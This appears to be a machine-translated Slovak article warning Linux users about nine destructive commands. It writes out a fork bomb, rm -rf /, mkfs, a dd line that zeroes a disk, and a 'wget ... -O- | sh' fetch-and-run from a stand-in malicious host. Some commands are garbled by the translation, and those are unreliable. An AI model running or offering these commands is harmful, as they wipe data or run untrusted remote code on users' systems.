9 Linux príkazy a kódy byť opatrný
Linux shell / terminal príkazy sú veľmi silné a jednoduchý príkaz by mohol viesť k vymazaniu priečinka, súborov alebo koreňového priečinka atď.
V niektorých prípadoch vás ani Linux nebudete spýtať na potvrdenie, ale spustí okamžite príkaz, ktorý vás spôsobí stratia cenné údaje a informácie uložené v týchto súboroch a priečinkoch.
Je bežné, aby ľudia publikovali obsah na webe odporúča používateľom nového systému Linux, aby spustili tieto príkazy. Môže to vyzerať ako vtip pre niekoho, kto poslal obsah, ale nie je to smiať pre osobu na druhom konci.
Zhromaždili sme niektoré Linuxové príkazy, ktoré sú pre váš systém dosť škodlivé, aby vám pomohli vyhnúť sa. Majte na pamäti, že sú skutočne nebezpečné a môžu byť dokonca zmenené rôznymi spôsobmi pri vytváraní nových príkazov spôsobiť viac škôd.
Dôležitá vec, ktorú treba poznamenať, je to niektoré z týchto príkazov sú nebezpečné iba vtedy, ak sú predpony sudo na Ubuntu. Zatiaľ čo na iných distribuciach Linuxu, väčšina z týchto príkazov bude nebezpečná ako root.
Pozrite sa na 9 príkazov a kódov by ste sa mali vyhnúť vykonaniu.
1. Príkaz bomby na štítky Linux
: () : |: & ;:
taktiež známy ako Vidlicová bomba je útok typu Denial-of-Service proti systému Linux. : () : |: & ;:
je funkcia bash. Po vykonaní, opakuje sa niekoľkokrát, kým sa systém nezmrazí.
Môžete sa ho zbaviť iba tým, že reštartujete systém. Takže buďte opatrní pri vykonávaní tohto príkazu vo vašom systéme Linux.
2. Priečinok mv / dev / null
mv priečinok / dev / null
je ďalší rizikový príkaz. Dev / null
alebo nulové zariadenie
je súbor zariadenia, ktorý vyradí všetky údaje napísané na nej, ale hlási, že operácia zápisu je úspešne vykonaná. Je tiež známy ako bit bucked alebo čierna diera.
3. príkaz rm -rf
rm -rf
príkaz je rýchly spôsob vymazať priečinok a jeho obsah v operačnom systéme Linux. Ak neviete, ako ho správne používať, môže sa stať veľmi nebezpečným pre systém. Najčastejšie kombinácie a možnosti používané s príkazom rm-rf sú uvedené nižšie:
rm
príkaz sa používa na odstránenie súborov v systéme Linux.rm -f
príkaz odstraňuje súbory iba na čítanie v priečinku bez výzvy.rm -r
príkaz vymaže obsah rekursu rekurzívne.rm -d
príkaz sa používa na odstránenie prázdneho adresára, ale odmietne odstrániť adresár, ak nie je prázdny.rm -rf /
príkaz sa používa na vynútené vymazanie (vymaže ho, aj keď je chránené proti zápisu) celého obsahu v koreňovom adresári a podadresároch.rm -rf *
príkaz sa používa na vynútené vymazanie celého obsahu v aktuálnom adresári (v adresári, v ktorom práve pracujete) a v podadresároch.rm -rf.
príkaz sa používa na vynútené vymazanie celého obsahu v aktuálnom priečinku a podadresároch.rm-r. [^.] *
príkaz možno tiež použiť.rm -i
príkaz sa používa na odstránenie súborov a priečinkov, ale výzva sa zobrazí pred odstránením.
4. príkaz mkfs
mkfs
môže byť nebezpečný príkaz pre systém založený na systéme Linux, ak nepoznáte jeho účel. Všetko napísané po mkfs bude formátované a nahradené prázdnym súborovým systémom Linux.
Všetky uvedené príkazy budú formátovať pevný disk a vyžadujú práva správcu:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos
mkfs.reiserfs
mkfs.vfat
Príkaz mkfs.cramfs
bude robiť to isté ako vyššie uvedené, ale nevyžaduje práva administrátora na vykonanie.
5. Dechtová bomba
decht
príkaz sa používa na kombinovanie viacerých súborov do jedného súboru (archivovaný súbor) v .decht Formát. Pomocou tohto príkazu je možné vytvoriť bombu s archívom (Tar).
to je archívny súbor, ktorý exploduje do tisícky alebo miliónov súborov s názvami podobnými existujúcim súborom do aktuálneho adresára skôr než do nového adresára, keď ste nezačínali.
Môžete sa vyhnúť tomu, že sa stanete obeťou detskej bomby pravidelne vytvára nový ochranný adresár vždy, keď dostanete tar súbor a potom presunúť prijatý tar súbor do tohto adresára predtým, než sa odhlási.
Ak je tar súbor skutočne dechtová bomba, môžete jednoducho odstrániť novo vytvorený adresár a zbaviť ho. Ďalším spôsobom, ako sa vyhnúť výbuchu dechtovej bomby, je cez -T
možnosť zobraziť celý obsah súboru tar aby ste nám predstavili typ obsahu obsiahnutého v súbore tar.
6. dd príkaz
dd
príkaz sa používa na kopírujte a konvertujte oddiely pevného disku. Môže sa však ukázať ako škodlivé, ak zadáte nesprávny cieľ.
Príkazom môže byť ktorýkoľvek z týchto príkazov:
dd if = / dev / hda z = / dev / hdb
dd if = / dev / hda z = / dev / sdb
dd if = niečo z = / dev / hda
dd if = niečo z = / dev / sda
Nasledujúci príkaz vynuluje celý primárny pevný disk: dd, ak = / dev / nula = / dev / mala
7. Shell kód skriptu
Niekto vás môže prenasledovať ktorý vám poskytne odkaz na shellový skript a schvaľuje vás, aby ste ho prevzali a spustili. Skript môže obsahovať nejaký škodlivý alebo nebezpečný kód vo vnútri. formát príkazu môže vyzerať takto: wget http: // some_malicious_source -O- | sh
. wget
stiahne skript, zatiaľ čo sh prevezme spustenie skriptu.
8. Škodlivý zdrojový kód
Niekto vám dá zdrojový kód a požiada vás o jeho zostavenie. Kód sa môže javiť ako bežný kód, ale v skutočnosti je niektorý škodlivý kód skrytý vo veľkom zdrojovom kóde a môže spôsobiť poškodenie vášho systému. Aby nedošlo k takémuto útoku, prijímajte a kompilujte zdrojový kód iba z dôveryhodných zdrojov.
9. Dekompresná bomba
Dostali ste komprimovaný súbor a zobrazí sa výzva na extrahovanie tohto súboru, ktorý sa zdá byť veľmi malý, ale môže byť niekoľko KB. v skutočnosti, tento komprimovaný malý formát obsahuje veľmi komprimované údaje.
Po dekomprimovaní súboru sa extrahujú stovky GB údajov môžete naplniť váš pevný disk znížiť výkon vášho systému. Ak sa chcete vyhnúť tejto situácii, nezabudnite vždy prijímať údaje z dôveryhodných zdrojov.